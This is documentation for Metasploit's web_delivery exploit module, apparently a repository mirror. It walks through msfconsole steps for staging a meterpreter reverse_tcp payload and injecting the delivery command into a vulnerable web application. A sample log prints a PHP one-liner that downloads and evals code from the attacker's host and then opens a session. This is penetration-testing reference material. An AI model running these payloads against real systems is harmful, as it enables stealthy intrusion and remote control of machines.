adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
11964c5c1a2f22ade03e2f5d2e01dce609848939
metasploit-gs/documentation/modules/exploit/multi/script/web_delivery.md
T
wchen-r7 11964c5c1a Add remote exploit demo and web_delivery doc
2016-03-02 19:52:11 -06:00

83 lines
3.3 KiB
Markdown
Raw Blame History

As a web server, web_delivery provides a great way to deliver a payload during post exploitation,
with the intention to stay stealthy because the payload does not touch the disk.
Currently, web_delivery supports three different languages for delivery: Python, PHP, and
Powershell. You should be able to tell which one you can use based on the target environment
you are in.
For example: if you have gained access through a PHP application, then it's safe to assume you can
use PHP. If you're in a Windows server (such as Windows Server 2008), then it's probably safe to
say the target supports Powershell.
## Verification Steps
To be able to use web_delivery, you must gain access to the target machine first, wit the ability
to execute either the Python, or PHP, or Powershell interpreter.
At that point, you would use web_delivery similar to the following example:
1. Start msfconsole
2. Do: ```use exploit/multi/script/web_delivery```
3. Do: ```set target 1``` (1 is PHP. You can use ```show targets``` to see other options)
4. Do: ```set PAYLOAD php/meterpreter/reverse_tcp``` (You can do ```show payloads``` to see what options are suitable for the target)
5. Do: ```set LHOST IP``` (The IP the payload should connect back to)
6. Do: ```run```
7. At this point, a handler is up for that payload. And the module should instruct you to execute
a command.
8. Copy the command. Depending on your pentesting scenario, typically you can either inject the
command and get code execution, or run it from the target's shell, and get a session:
```
msf exploit(web_delivery) > run
[*] Exploit running as background job.
[*] Started reverse TCP handler on 172.16.23.1:4444
msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8080/z5inGkwCCQiz9
[*] Local IP: http://10.6.0.86:8080/z5inGkwCCQiz9
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.23.1:8080/z5inGkwCCQiz9'));"
[*] Delivering Payload
[*] Sending stage (33684 bytes) to 172.16.23.134
[*] Meterpreter session 1 opened (172.16.23.1:4444 -> 172.16.23.134:41684) at 2016-03-02 11:41:34 -0600
```
## Targets
**Python**
Python is a fairly popular language, especially on unix-based systems. For example, it comes with
Ubuntu Linux by default since 8.04. As well as Debian, and Mac OS X since 10.3.
**PHP**
PHP is a fairly popular language for web servers, especially Apache.
**Powershell/win**
Powershell is a popular language for newer Windows systems. Windows 7 and Windows Server 2008 R2
are the first Windows versions to come with Powershell by default, and not older systems.
## Scenarios
**Against a compromised web application**
web_delivery would work nicely for a web application with a command execution vulnerability.
One way to approach this would be:
1. Start exploit/multi/script/web_delivery
2. Use Burp Suite to intercept the HTTP/HTTPS request, place the command in the parameter that
results in arbitrary code execution.
3. Hopefully the modified HTTP/HTTPS request is successful, and you should get a session.
**Shell upgrade**
web_delivery is also useful to upgrade a shell type payload to a meterpreter one.
Here's how that can be done:
1. Start exploit/multi/script/web_delivery that generates/
2. On msfconsole, interact with the shell, and copy/pate the command.
3. You should get a meterpreter session.
Reference in New Issue View Git Blame Copy Permalink